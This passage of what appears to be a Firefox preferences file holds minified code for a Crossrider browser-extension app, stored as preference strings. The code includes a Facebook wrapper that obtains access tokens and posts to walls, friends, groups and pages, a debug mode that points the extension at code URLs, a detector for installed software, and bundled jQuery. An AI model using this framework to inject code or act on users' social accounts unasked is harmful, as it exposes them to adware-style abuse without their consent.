fbShareCallbackFunction=null;this.fbPublishCallbackFunction=null;this.hash_to_params=function(G){params=\&quot;\&quot;;for(var F in G){param=F+\&quot;=\&quot;+escape(G[F]);params+=\&quot;&amp;\&quot;+param}return params};function y(G,H){if(w){var F=E+\&quot;/\&quot;+G+\&quot;?appid=\&quot;+f.appInfo.id;if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){F+=\&quot;&amp;\&quot;+o()+c+H}if(f.platform==\&quot;IE\&quot;){F+=H+\&quot;&amp;objid=\&quot;+e}return F}else{var F=E;if(f.platform==\&quot;IE\&quot;){F+=\&quot;&amp;appid=\&quot;+f.appInfo.id+\&quot;&amp;api=\&quot;+G+H+\&quot;&amp;objid=\&quot;+e}if(f.platform==\&quot;FF\&quot;||f.platform==\&quot;CH\&quot;){F+=\&quot;&amp;api=\&quot;+G+\&quot;&amp;\&quot;+o()+H}return F}}function C(){var F=/^(https?\\:\\/\\/(www|ssl)\\.facebook\\.com\\/login\\.php|https?\\:\\/\\/www\\.facebook\\.com\\/connect\\/uiserver\\.php|https?\\:\\/\\/static\\.ak\\.fbcdn\\.net\\/connect\\/xd_proxy\\.php|https?\\:\\/\\/.*?fbcdn.net\\/connect\\/xd_proxy\\.php|https?\\:\\/\\/www\\.facebook\\.com\\/dialog\\/permissions\\.request|https?\\:\\/\\/www\\.facebook\\.com\\/dialog\\/oauth).*/;if(document.location.href.match(F)){return true}return false}this.invite=function(I,G){if(C()){return}this.inviteCallbackFunction=G;var H=this.hash_to_params(I);var F=y(\&quot;invite\&quot;,H);p(n(\&quot;invite\&quot;),F)};this.connect=function(G){if(C()){return}this.connectCallbackFunction=G;var F=y(\&quot;connect\&quot;,\&quot;\&quot;);if(F.indexOf(\&quot;?\&quot;)&gt;=0){F+=\&quot;&amp;get_access_token=true\&quot;}else{F+=\&quot;?get_access_token=true\&quot;}v(n(\&quot;connect\&quot;),F)};this.isConnected=function(G){if(C()){return}this.isConnectedCallbackFunction=G;var F=y(\&quot;is_connected\&quot;,\&quot;\&quot;);v(n(\&quot;isConnected\&quot;),F)};this.postToWall=function(I,G){if(C()){return}this.postToWallCallbackFunction=G;var H=this.hash_to_params(I);var F=y(\&quot;post_to_wall\&quot;,H);v(n(\&quot;postToWall\&quot;),F)};this.getFriends=function(G){if(C()){return}this.getFriendsCallbackFunction=G;var F=y(\&quot;get_friends\&quot;,\&quot;\&quot;);v(n(\&quot;getFriends\&quot;),F)};this.getInfo=function(I,G){if(C()){return}this.getInfoCallbackFunction=G;var H=\&quot;&amp;id=\&quot;+escape(I);var F=y(\&quot;get_info\&quot;,H);v(n(\&quot;getInfo\&quot;),F)};this.getMyInfo=function(F){if(C()){return}this.getInfo(\&quot;me\&quot;,F)};this.updateStatus=function(H,G){if(C()){return}this.updateStatusCallbackFunction=G;var I=\&quot;&amp;message=\&quot;+escape(H);var F=y(\&quot;update_status\&quot;,I);v(n(\&quot;updateStatus\&quot;),F)};this.logout=function(G){if(C()){return}this.logoutCallbackFunction=G;var F=y(\&quot;logout\&quot;,\&quot;\&quot;);v(n(\&quot;logout\&quot;),F)};this.getGroups=function(G){if(C()){return}this.getGroupsCallbackFunction=G;var F=y(\&quot;get_groups\&quot;,\&quot;\&quot;);v(n(\&quot;getGroups\&quot;),F)};this.getPages=function(G){if(C()){return}this.getPagesCallbackFunction=G;var F=y(\&quot;get_pages\&quot;,\&quot;\&quot;);v(n(\&quot;getPages\&quot;),F)};this.postToGroups=function(I,K,G){if(C()){return}this.postToGroupsCallbackFunction=G;var H=I.join(\&quot;,\&quot;);var J=this.hash_to_params(K);J=\&quot;&amp;ids=\&quot;+H+J;var F=y(\&quot;post_to_groups\&quot;,J);v(n(\&quot;postToGroups\&quot;),F)};this.postToGroup=function(G,H,F){if(C()){return}this.postToGroups([G],H,F)};this.postToPages=function(F,K,H){if(C()){return}this.postToPagesCallbackFunction=H;var I=F.join(\&quot;,\&quot;);var J=this.hash_to_params(K);J=\&quot;&amp;ids=\&quot;+I+J;var G=y(\&quot;post_to_pages\&quot;,J);v(n(\&quot;postToPages\&quot;),G)};this.postToPage=function(F,H,G){if(C()){return}this.postToPages([F],H,G)};this.postToFriends=function(H,K,G){if(C()){return}this.postToFriendsCallbackFunction=G;var I=H.join(\&quot;,\&quot;);var J=this.hash_to_params(K);J=\&quot;&amp;ids=\&quot;+I+J;var F=y(\&quot;post_to_friends\&quot;,J);v(n(\&quot;postToFriends\&quot;),F)};this.postToFriend=function(G,H,F){if(C()){return}this.postToFriends([G],H,F)};this.fbShare=function(H,G){if(C()){return}this.fbShareCallbackFunction=G;var I=\&quot;&amp;url=\&quot;+escape(H);var F=y(\&quot;ui_share\&quot;,I);p(n(\&quot;fbShare\&quot;),F)};this.fbPublish=function(I,G){if(C()){return}this.fbPublishCallbackFunction=G;var H=this.hash_to_params(I);var F=y(\&quot;ui_publish\&quot;,H);p(n(\&quot;fbPublish\&quot;),F)}}function m(C,y,w,A){function z(G){if(G==null){return null}return(G==\&quot;1\&quot;||G==\&quot;true\&quot;)}function B(G){if(G==null){return null}return parseInt(G)}if((A!=e)&amp;&amp;(f.platform==\&quot;IE\&quot;)){return}if(w==\&quot;CrossRiderAPI__SocialCloseEventIframe\&quot;){b(\&quot;crossrider--invite-iframe\&quot;);if(u.inviteCallbackFunction){u.inviteCallbackFunction(B(y),C)}return}if(w==\&quot;CrossRiderAPI__FacebookConnectRequest\&quot;){b(\&quot;crossrider--connect-iframe\&quot;);if(u.connectCallbackFunction){var x=null,F=null,D=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}if(E.hasOwnProperty(\&quot;response\&quot;)){F=E.response}if(E.hasOwnProperty(\&quot;accessToken\&quot;)){D=E.accessToken}}u.connectCallbackFunction(F,C,D)}}if(w==\&quot;CrossRiderAPI__FacebookIsConnectedRequest\&quot;){b(\&quot;crossrider--is_connected-iframe\&quot;);if(u.isConnectedCallbackFunction){u.isConnectedCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToWallRequest\&quot;){b(\&quot;crossrider--post_to_wall-iframe\&quot;);if(u.postToWallCallbackFunction){u.postToWallCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookGetFriendsRequest\&quot;){b(\&quot;crossrider--get_friends-iframe\&quot;);if(u.getFriendsCallbackFunction){var x=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}}u.getFriendsCallbackFunction(x,C)}}if(w==\&quot;CrossRiderAPI__FacebookGetInfoRequest\&quot;){b(\&quot;crossrider--get_info-iframe\&quot;);if(u.getInfoCallbackFunction){var E=(y==null?null:l(y));u.getInfoCallbackFunction(E,C)}}if(w==\&quot;CrossRiderAPI__FacebookUpdateStatusRequest\&quot;){b(\&quot;crossrider--update_status-iframe\&quot;);if(u.updateStatusCallbackFunction){u.updateStatusCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookLogoutRequest\&quot;){b(\&quot;crossrider--logout-iframe\&quot;);if(u.logoutCallbackFunction){u.logoutCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookGetGroupsRequest\&quot;){b(\&quot;crossrider--get_groups-iframe\&quot;);if(u.getGroupsCallbackFunction){var x=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}}u.getGroupsCallbackFunction(x,C)}}if(w==\&quot;CrossRiderAPI__FacebookGetPagesRequest\&quot;){b(\&quot;crossrider--get_pages-iframe\&quot;);if(u.getPagesCallbackFunction){var x=null;if(y!=null){var E=l(y);if(typeof(E.data)==\&quot;string\&quot;){x=l(E.data)}if(typeof(E.data)==\&quot;object\&quot;){x=E.data}}u.getPagesCallbackFunction(x,C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToGroupsRequest\&quot;){b(\&quot;crossrider--post_to_groups-iframe\&quot;);if(u.postToGroupsCallbackFunction){u.postToGroupsCallbackFunction(B(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToPagesRequest\&quot;){b(\&quot;crossrider--post_to_pages-iframe\&quot;);if(u.postToPagesCallbackFunction){u.postToPagesCallbackFunction(B(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookPostToFriendsRequest\&quot;){b(\&quot;crossrider--post_to_friends-iframe\&quot;);if(u.postToFriendsCallbackFunction){u.postToFriendsCallbackFunction(B(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookFbShareRequest\&quot;){b(\&quot;crossrider--ui_share-iframe\&quot;);if(u.fbShareCallbackFunction){u.fbShareCallbackFunction(z(y),C)}}if(w==\&quot;CrossRiderAPI__FacebookFbPublishRequest\&quot;){b(\&quot;crossrider--ui_publish-iframe\&quot;);if(u.fbPublishCallbackFunction){u.fbPublishCallbackFunction(z(y),C)}}}var s=f.appInfo.id,j=f.internal.manifest.groupId,q=f.internal.manifest.remoteFbApiUrl;f.fbAPI=new r(s,j,q);f.internal.fbCb=m})(appAPI);var __CR_FB_CB_FUNC__=appAPI.internal.fbCb;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_15.name&quot;, &quot;FacebookFFIE&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_15.ver&quot;, 1);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_16.code&quot;, &quot;if((typeof isBackground===\&quot;undefined\&quot;||isBackground!=true)&amp;&amp;(typeof _firefoxVersion!==\&quot;undefined\&quot;&amp;&amp;_firefoxVersion&gt;14)&amp;&amp;typeof sharedObject!==\&quot;undefined\&quot;){UserReport=sharedObject.wrappedUserReport?sharedObject.wrappedUserReport:UserReport;alert=sharedObject.wrappedAlert?sharedObject.wrappedAlert:alert;console=sharedObject.wrappedConsole?sharedObject.wrappedConsole:console;FFInternal=sharedObject.wrappedFFInternal?sharedObject.wrappedFFInternal:FFInternal}(function(){var j=(typeof __NewXPI__!==\&quot;undefined\&quot;&amp;&amp;__NewXPI__==true);function f(e){this._MessageObject=e}(function(l){function e(){return(FFInternal.platformVersion&gt;80)}function m(){var o;if(document.defaultView.top==document.defaultView){o=FFInternal.getTabID(document)}else{if(window&amp;&amp;window._CR_tabId){o=window._CR_tabId}else{o=FFInternal.getTabID(document,document.location.href,true)}}return o}function n(r){var p=\&quot;appAPI.message.addListener UserCallback\&quot;;var q=(typeof r===\&quot;function\&quot;&amp;&amp;typeof r.name===\&quot;string\&quot;&amp;&amp;r.name.length&gt;0)?r.name:p;var o=UserReport.surroundCallbackWithTryCatch(r,q);if(!j){return o}_newCallback=function(){var s=o;try{arguments[0]=appAPI.JSON.parse(arguments[0])}catch(t){}return s(arguments[0])};return _newCallback}l.addListener=function(o){var q;_callbackFunc=n(o);if(document.location.href==\&quot;chrome://crossriderapp\&quot;+appAPI.appID+\&quot;/content/background.html\&quot;.toLowerCase()){q=unsafeWindow.listen(_callbackFunc)}else{var p=m();if(!e()){p=document}q=FFInternal.message.listenOrigin(_callbackFunc,p);jQuery(window).unload(function(){if(e()){appAPI.message.removeListener(q)}else{FFInternal.message.removeListenerOrigin(q)}})}return q};l.removeListener=function(p){if(document.location.href==\&quot;chrome://crossriderapp\&quot;+appAPI.appID+\&quot;/content/background.html\&quot;.toLowerCase()){return unsafeWindow.removeListen(p)}else{var o=m();if(o){return FFInternal.message.removeListenerOrigin(p,o)}}};l.toActiveTab=function(p,o){var q=j?appAPI.JSON.stringify(p):p;if(typeof q!==\&quot;undefined\&quot;){return FFInternal.message.toActiveTab(q,o)}};l.toAllTabs=function(p,o){var q=j?appAPI.JSON.stringify(p):p;if(typeof q!==\&quot;undefined\&quot;){return FFInternal.message.toAllTabs(q,o)}};l.toBackground=function(o){var p=j?appAPI.JSON.stringify(o):o;if(typeof p!==\&quot;undefined\&quot;){return FFInternal.message.toBackground(p)}};l.toCurrentTabIframes=function(o){var p=j?appAPI.JSON.stringify(o):o;if(typeof p!==\&quot;undefined\&quot;){return FFInternal.message.toCurrentTabIframes(p,document)}};l.toCurrentTabWindow=function(o){var p=j?appAPI.JSON.stringify(o):o;if(typeof p!==\&quot;undefined\&quot;){return FFInternal.message.toCurrentTabWindow(p,document)}};l.toAllOtherTabs=function(p,o){var q=j?appAPI.JSON.stringify(p):p;if(typeof q!==\&quot;undefined\&quot;){return FFInternal.message.toAllOtherTabs(q,o)}}})(f.prototype);function h(e){this._DBObject=e}(function(e){function n(o){var q;try{q=escape(appAPI.JSON.stringify(o))}catch(p){q=undefined}return q}function m(q){var o;try{o=appAPI.JSON.parse(unescape(q))}catch(p){o=undefined}return o}function l(o){return function(q){var p=o;var r=m(q);if(r){p(r)}}}e.set=function(q,r,p,s){var o=j?n(r):r;if(typeof o!==\&quot;undefined\&quot;){return this._DBObject.set(q,o,p,s)}};e.get=function(o,p){if(!j){return this._DBObject.get(o,p)}if(p){this._DBObject.get(o,l(p))}else{return m(this._DBObject.get(o))}};e.list=function(p){if(!j){return this._DBObject.list(p)}if(p){this._DBObject.list(l(p))}else{var o=this._DBObject.list();return m(this._DBObject.list())}};e.getList=function(o){if(!j){return this._DBObject.getList(o)}if(typeof o==\&quot;function\&quot;){this._DBObject.getList(function(p){p=appAPI.JSON.parse(p);o(p)})}else{dbEntriesResultArray=m(this._DBObject.getList());return dbEntriesResultArray}};e.getExpiration=function(o,p){if(!j){return this._DBObject.getExpiration(o,p)}if(typeof p==\&quot;function\&quot;){this._DBObject.getExpiration(o,function(q){p(new Date(q))})}else{return new Date(this._DBObject.getExpiration(o))}};e.updateExpiration=function(p,o,q){return this._DBObject.updateExpiration(p,o,q)};e.removeExpired=function(o){return this._DBObject.removeExpired(o)};e.remove=function(o,p){return this._DBObject.remove(o,p)};e.removeAll=function(o){return this._DBObject.removeAll(o)};e.setFromRemote=function(r,q,o,p,s){return this._DBObject.setFromRemote(r,q,o,p,s)}})(h.prototype);function k(){this.turnOn=function(l){if(typeof(l)===\&quot;undefined\&quot;||l===null){return false}if(typeof(l.userCode)!==\&quot;string\&quot;){return false}if(typeof(l.backgroundCode)!==\&quot;string\&quot;){return false}var m=l.userCode;var e=l.backgroundCode;FFInternal.prefs.setBoolPref(\&quot;debug\&quot;,true);FFInternal.prefs.setIntPref(\&quot;debug_app\&quot;,appAPI.appID);FFInternal.prefs.setCharPref(\&quot;debug_url\&quot;,m);FFInternal.prefs.setCharPref(\&quot;debug_background_url\&quot;,e);FFInternal.background.reload();return true};this.turnOff=function(){FFInternal.prefs.setBoolPref(\&quot;debug\&quot;,false)};this.isDebugMode=function(){return FFInternal.prefs.getBoolPref(\&quot;debug\&quot;)};this.getDebugUrl=function(){var e=\&quot;\&quot;;if(FFInternal.prefs.hasValue(\&quot;debug_url\&quot;)){e=FFInternal.prefs.getCharPref(\&quot;debug_url\&quot;)}var l=\&quot;\&quot;;if(FFInternal.prefs.hasValue(\&quot;debug_background_url\&quot;)){l=FFInternal.prefs.getCharPref(\&quot;debug_background_url\&quot;)}return{userCode:e,backgroundCode:l}};return this}function c(l,e){if(typeof l===\&quot;undefined\&quot;||typeof e===\&quot;undefined\&quot;){return}if(typeof l.firefox===\&quot;undefined\&quot;){return}e.firefox={};e.firefox.notification=l.firefox.notification;e.firefox.omnibox=l.firefox.omnibox;e.firefox.browserAction=l.firefox.browserAction;e.browserAction=FFInternal.browserAction}function b(l,e){if(typeof l===\&quot;undefined\&quot;||typeof e===\&quot;undefined\&quot;){return}if(typeof l.internal===\&quot;undefined\&quot;){return}if(typeof(e.installer)===\&quot;undefined\&quot;){e.installer={}}e.installer.getIds=function(){return l.internal.db.get(\&quot;InstallerIdentifiers\&quot;)};e.installer.getUserId=function(){var m=appAPI.installer.getIds();if(m!==null){return m.installer_bic}return null};e.installer.getInstalledSoftware=function(){return l.internal.db.get(\&quot;SoftwareDetected\&quot;)}}function i(l,e){if(typeof l===\&quot;undefined\&quot;||typeof e===\&quot;undefined\&quot;){return}if(e.isBackground){e.onRequest=function(m,n){l.onRequest(m,n)};e.onBeforeNavigate=function(m,n){l.onBeforeNavigate(m,n)};if(typeof l.webRequest!==\&quot;undefined\&quot;){e.webRequest=l.webRequest}if(typeof l.tabs!==\&quot;undefined\&quot;){e.tabs=l.tabs.toAppAPIPublicObj()}if(typeof l.contextMenu!==\&quot;undefined\&quot;){e.contextMenu=l.contextMenu}}}if(typeof(appAPI)==\&quot;undefined\&quot;){appAPI={}}var a=FFInternal.appID+\&quot;.\&quot;;appAPI.appID=FFInternal.appID;appAPI.version=FFInternal.version;appAPI.platform=FFInternal.platform;appAPI.cr_version=FFInternal.cr_version;b(FFInternal,appAPI);if(typeof isBackground!==\&quot;undefined\&quot;){appAPI.isBackground=isBackground}else{appAPI.isBackground=(document.location.href==\&quot;chrome://crossriderapp\&quot;+appAPI.appID+\&quot;/content/background.html\&quot;.toLowerCase())}i(FFInternal,appAPI);appAPI.setTargetIframe=function(e){return FFInternal.setTargetIframe(e)};appAPI.openURL=function(l,e){return FFInternal.openURL(l,e)};appAPI.dns={};appAPI.dns.resolveIP=function(e){return FFInternal.dns.resolveIP(e)};appAPI.getTabId=function(){var e=document;if(appAPI.dom.isIframe()){e=top.document}return FFInternal.getTabID(e)};appAPI.getCrossriderID=function(){return FFInternal.prefs.getCharPref(\&quot;bic\&quot;)};appAPI.isDebugMode=function(){return FFInternal.isDebugMode()};appAPI.superAlert=function(e){return FFInternal.superAlert(e)};c(FFInternal,appAPI);appAPI.message=new f(FFInternal.message);appAPI.request=FFInternal.request;appAPI.request.sync=FFInternal.request.sync;appAPI.db=new h(FFInternal.db);appAPI.db.async=new h(FFInternal.db.async);appAPI.internal={};appAPI.internal.db=new h(FFInternal.internal.db);appAPI.internal.db.async=new h(FFInternal.internal.db.async);appAPI.internal.reloadBackground=function(){return FFInternal.background.reload()};appAPI.internal.forceUpdate=function(){return FFInternal.internal.forceUpdate()};appAPI.internal.file={};appAPI.internal.file.get=function(e,l){return FFInternal.internal.file.get(e,l)};appAPI.internal.debug=new k();function d(m,l,n,e){if(\&quot;defineProperty\&quot; in Object){Object.defineProperty(m,l,{get:function(){return FFInternal.prefs[e](a+n)}})}else{m[l]=FFInternal.prefs[e](a+n)}}appAPI.appInfo=(function(){this.id=appAPI.appID;this.platformVersion=FFInternal.platformVersion;this.userId=FFInternal.prefs.getCharPref(\&quot;bic\&quot;);this.environment=\&quot;production\&quot;;if(FFInternal.prefs.hasValue(\&quot;modetype\&quot;)){this.environment=FFInternal.prefs.getCharPref(\&quot;modetype\&quot;)}d(this,\&quot;name\&quot;,\&quot;name\&quot;,\&quot;getCharPref\&quot;);d(this,\&quot;description\&quot;,\&quot;description\&quot;,\&quot;getCharPref\&quot;);d(this,\&quot;version\&quot;,\&quot;ver\&quot;,\&quot;getIntPref\&quot;);return this})();appAPI.internal.manifest=(function(){d(this,\&quot;trustedDomain\&quot;,\&quot;domain\&quot;,\&quot;getCharPref\&quot;);d(this,\&quot;groupId\&quot;,\&quot;group\&quot;,\&quot;getIntPref\&quot;);d(this,\&quot;remoteFbApiUrl\&quot;,\&quot;fbremoteurl\&quot;,\&quot;getCharPref\&quot;);return this})();try{window._CR_tabId=(function(){return(document.defaultView.top==document.defaultView)?FFInternal.getTabID(document):FFInternal.getTabID(document,document.location.href,true)}())}catch(g){}})(FFInternal,appAPI);&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_16.name&quot;, &quot;FFAppAPIWrapper&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_16.ver&quot;, 4);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_17.code&quot;, &quot;if(typeof window!==\&quot;undefined\&quot;){\n/*!\n * jQuery JavaScript Library v1.4.2\n * hxxp://jquery.com/\n *\n * Copyright 2010, John Resig\n * Dual licensed under the MIT or GPL Version 2 licenses.\n * hxxp://jquery.org/license\n *\n * Includes Sizzle.js\n * hxxp://sizzlejs.com/\n * Copyright 2010, The Dojo Foundation\n * Released under the MIT, BSD, and GPL Licenses.\n *\n * Date: Sat Feb 13 22:33:48 2010 -0500\n */\nvar $$jquery;(function(aM,C){var a=function(aY,aZ){return new a.fn.init(aY,aZ)},n=aM.jQuery,R=aM.$,ab=aM.document,X,P=/^[^&lt;]*(&lt;[\\w\\W]+&gt;)[^&gt;]*$|^#([\\w-]+)$/,aW=/^.[^:#\\[\\.,]*$/,ax=/\\S/,M=/^(\\s|\\u00A0)+|(\\s|\\u00A0)+$/g,e=/^&lt;(\\w+)\\s*\\/?&gt;(?:&lt;\\/\\1&gt;)?$/,b=navigator.userAgent,u,K=false,ad=[],aG,at=Object.prototype.toString,ap=Object.prototype.hasOwnProperty,g=Array.prototype.push,F=Array.prototype.slice,s=Array.prototype.indexOf;a.fn=a.prototype={init:function(aY,a1){var a0,a2,aZ,a3;if(!aY){return this}if(aY.nodeType){this.context=this[0]=aY;this.length=1;return this}if(aY===\&quot;body\&quot;&amp;&amp;!a1){this.context=ab;this[0]=ab.body;this.selector=\&quot;body\&quot;;this.length=1;return this}if(typeof aY===\&quot;string\&quot;){a0=P.exec(aY);if(a0&amp;&amp;(a0[1]||!a1)){if(a0[1]){a3=(a1?a1.ownerDocument||a1:ab);aZ=e.exec(aY);if(aZ){if(a.isPlainObject(a1)){aY=[ab.createElement(aZ[1])];a.fn.attr.call(aY,a1,true)}else{aY=[a3.createElement(aZ[1])]}}else{aZ=J([a0[1]],[a3]);aY=(aZ.cacheable?aZ.fragment.cloneNode(true):aZ.fragment).childNodes}return a.merge(this,aY)}else{a2=ab.getElementById(a0[2]);if(a2){if(a2.id!==a0[2]){return X.find(aY)}this.length=1;this[0]=a2}this.context=ab;this.selector=aY;return this}}else{if(!a1&amp;&amp;/^\\w+$/.test(aY)){this.selector=aY;this.context=ab;aY=ab.getElementsByTagName(aY);return a.merge(this,aY)}else{if(!a1||a1.jquery){return(a1||X).find(aY)}else{return a(a1).find(aY)}}}}else{if(a.isFunction(aY)){return X.ready(aY)}}if(aY.selector!==C){this.selector=aY.selector;this.context=aY.context}return a.makeArray(aY,this)},selector:\&quot;\&quot;,jquery:\&quot;1.4.2\&quot;,length:0,size:function(){return this.length},toArray:function(){return F.call(this,0)},get:function(aY){return aY==null?this.toArray():(aY&lt;0?this.slice(aY)[0]:this[aY])},pushStack:function(aZ,a1,aY){var a0=a();if(a.isArray(aZ)){g.apply(a0,aZ)}else{a.merge(a0,aZ)}a0.prevObject=this;a0.context=this.context;if(a1===\&quot;find\&quot;){a0.selector=this.selector+(this.selector?\&quot; \&quot;:\&quot;\&quot;)+aY}else{if(a1){a0.selector=this.selector+\&quot;.\&quot;+a1+\&quot;(\&quot;+aY+\&quot;)\&quot;}}return a0},each:function(aZ,aY){return a.each(this,aZ,aY)},ready:function(aY){a.bindReady();if(a.isReady){aY.call(ab,a)}else{if(ad){ad.push(aY)}}return this},eq:function(aY){return aY===-1?this.slice(aY):this.slice(aY,+aY+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(F.apply(this,arguments),\&quot;slice\&quot;,F.call(arguments).join(\&quot;,\&quot;))},map:function(aY){return this.pushStack(a.map(this,function(a0,aZ){return aY.call(a0,aZ,a0)}))},end:function(){return this.prevObject||a(null)},push:g,sort:[].sort,splice:[].splice};a.fn.init.prototype=a.fn;a.extend=a.fn.extend=function(){var a3=arguments[0]||{},a2=1,a1=arguments.length,a5=false,a6,a0,aY,aZ;if(typeof a3===\&quot;boolean\&quot;){a5=a3;a3=arguments[1]||{};a2=2}if(typeof a3!==\&quot;object\&quot;&amp;&amp;!a.isFunction(a3)){a3={}}if(a1===a2){a3=this;--a2}for(;a2&lt;a1;a2++){if((a6=arguments[a2])!=null){for(a0 in a6){aY=a3[a0];aZ=a6[a0];if(a3===aZ){continue}if(a5&amp;&amp;aZ&amp;&amp;(a.isPlainObject(aZ)||a.isArray(aZ))){var a4=aY&amp;&amp;(a.isPlainObject(aY)||a.isArray(aY))?aY:a.isArray(aZ)?[]:{};a3[a0]=a.extend(a5,a4,aZ)}else{if(aZ!==C){a3[a0]=aZ}}}}}return a3};a.extend({noConflict:function(aY){aM.$=R;if(aY){aM.jQuery=n}return a},isReady:false,ready:function(){if(!a.isReady){if(!ab.body){return setTimeout(a.ready,13)}a.isReady=true;if(ad){var aZ,aY=0;while((aZ=ad[aY++])){aZ.call(ab,a)}ad=null}if(a.fn.triggerHandler){a(ab).triggerHandler(\&quot;ready\&quot;)}}},bindReady:function(){if(K){return}K=true;if(ab.readyState===\&quot;complete\&quot;){return a.ready()}if(ab.addEventListener){ab.addEventListener(\&quot;DOMContentLoaded\&quot;,aG,false);aM.addEventListener(\&quot;load\&quot;,a.ready,false)}else{if(ab.attachEvent){ab.attachEvent(\&quot;onreadystatechange\&quot;,aG);aM.attachEvent(\&quot;onload\&quot;,a.ready);var aY=false;try{aY=aM.frameElement==null}catch(aZ){}if(ab.documentElement.doScroll&amp;&amp;aY){x()}}}},isFunction:function(aY){return at.call(aY)===\&quot;[object Function]\&quot;},isArray:function(aY){return at.call(aY)===\&quot;[object Array]\&quot;},isPlainObject:function(aZ){if(!aZ||at.call(aZ)!==\&quot;[object Object]\&quot;||aZ.nodeType||aZ.setInterval){return false}if(aZ.constructor&amp;&amp;!ap.call(aZ,\&quot;constructor\&quot;)&amp;&amp;!ap.call(aZ.constructor.prototype,\&quot;isPrototypeOf\&quot;)){return false}var aY;for(aY in aZ){}return aY===C||ap.call(aZ,aY)},isEmptyObject:function(aZ){for(var aY in aZ){return false}return true},error:function(aY){throw aY},parseJSON:function(aY){if(typeof aY!==\&quot;string\&quot;||!aY){return null}aY=a.trim(aY);if(/^[\\],:{}\\s]*$/.test(aY.replace(/\\\\(?:[\&quot;\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\&quot;@\&quot;).replace(/\&quot;[^\&quot;\\\\\\n\\r]*\&quot;|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\&quot;]\&quot;).replace(/(?:^|:|,)(?:\\s*\\[)+/g,\&quot;\&quot;))){return aM.JSON&amp;&amp;aM.JSON.parse?aM.JSON.parse(aY):(new Function(\&quot;return \&quot;+aY))()}else{a.error(\&quot;Invalid JSON: \&quot;+aY)}},noop:function(){},globalEval:function(a0){if(a0&amp;&amp;ax.test(a0)){var aZ=ab.getElementsByTagName(\&quot;head\&quot;)[0]||ab.documentElement,aY=ab.createElement(\&quot;script\&quot;);aY.type=\&quot;text/javascript\&quot;;if(a.support.scriptEval){aY.appendChild(ab.createTextNode(a0))}else{aY.text=a0}aZ.insertBefore(aY,aZ.firstChild);aZ.removeChild(aY)}},nodeName:function(aZ,aY){return aZ.nodeName&amp;&amp;aZ.nodeName.toUpperCase()===aY.toUpperCase()},each:function(a1,a5,a0){var aZ,a2=0,a3=a1.length,aY=a3===C||a.isFunction(a1);if(a0){if(aY){for(aZ in a1){if(a5.apply(a1[aZ],a0)===false){break}}}else{for(;a2&lt;a3;){if(a5.apply(a1[a2++],a0)===false){break}}}}else{if(aY){for(aZ in a1){if(a5.call(a1[aZ],aZ,a1[aZ])===false){break}}}else{for(var a4=a1[0];a2&lt;a3&amp;&amp;a5.call(a4,a2,a4)!==false;a4=a1[++a2]){}}}return a1},trim:function(aY){return(aY||\&quot;\&quot;).replace(M,\&quot;\&quot;)},makeArray:function(a0,aZ){var aY=aZ||[];if(a0!=null){if(a0.length==null||typeof a0===\&quot;string\&quot;||a.isFunction(a0)||(typeof a0!==\&quot;function\&quot;&amp;&amp;a0.setInterval)){g.call(aY,a0)}else{a.merge(aY,a0)}}return aY},inArray:function(a0,a1){if(a1.indexOf){return a1.indexOf(a0)}for(var aY=0,aZ=a1.length;aY&lt;aZ;aY++){if(a1[aY]===a0){return aY}}return -1},merge:function(a2,a0){var a1=a2.length,aZ=0;if(typeof a0.length===\&quot;number\&quot;){for(var aY=a0.length;aZ&lt;aY;aZ++){a2[a1++]=a0[aZ]}}else{while(a0[aZ]!==C){a2[a1++]=a0[aZ++]}}a2.length=a1;return a2},grep:function(aZ,a3,aY){var a0=[];for(var a1=0,a2=aZ.length;a1&lt;a2;a1++){if(!aY!==!a3(aZ[a1],a1)){a0.push(aZ[a1])}}return a0},map:function(aZ,a4,aY){var a0=[],a3;for(var a1=0,a2=aZ.length;a1&lt;a2;a1++){a3=a4(aZ[a1],a1,aY);if(a3!=null){a0[a0.length]=a3}}return a0.concat.apply([],a0)},guid:1,proxy:function(a0,aZ,aY){if(arguments.length===2){if(typeof aZ===\&quot;string\&quot;){aY=a0;a0=aY[aZ];aZ=C}else{if(aZ&amp;&amp;!a.isFunction(aZ)){aY=aZ;aZ=C}}}if(!aZ&amp;&amp;a0){aZ=function(){return a0.apply(aY||this,arguments)}}if(a0){aZ.guid=a0.guid=a0.guid||aZ.guid||a.guid++}return aZ},uaMatch:function(aZ){aZ=aZ.toLowerCase();var aY=/(webkit)[ \\/]([\\w.]+)/.exec(aZ)||/(opera)(?:.*version)?[ \\/]([\\w.]+)/.exec(aZ)||/(msie) ([\\w.]+)/.exec(aZ)||!/compatible/.test(aZ)&amp;&amp;/(mozilla)(?:.*? rv:([\\w.]+))?/.exec(aZ)||[];return{browser:aY[1]||\&quot;\&quot;,version:aY[2]||\&quot;0\&quot;}},browser:{}});u=a.uaMatch(b);if(u.browser){a.browser[u.browser]=true;a.browser.version=u.version}if(a.browser.webkit){a.browser.safari=true}if(s){a.inArray=function(aY,aZ){return 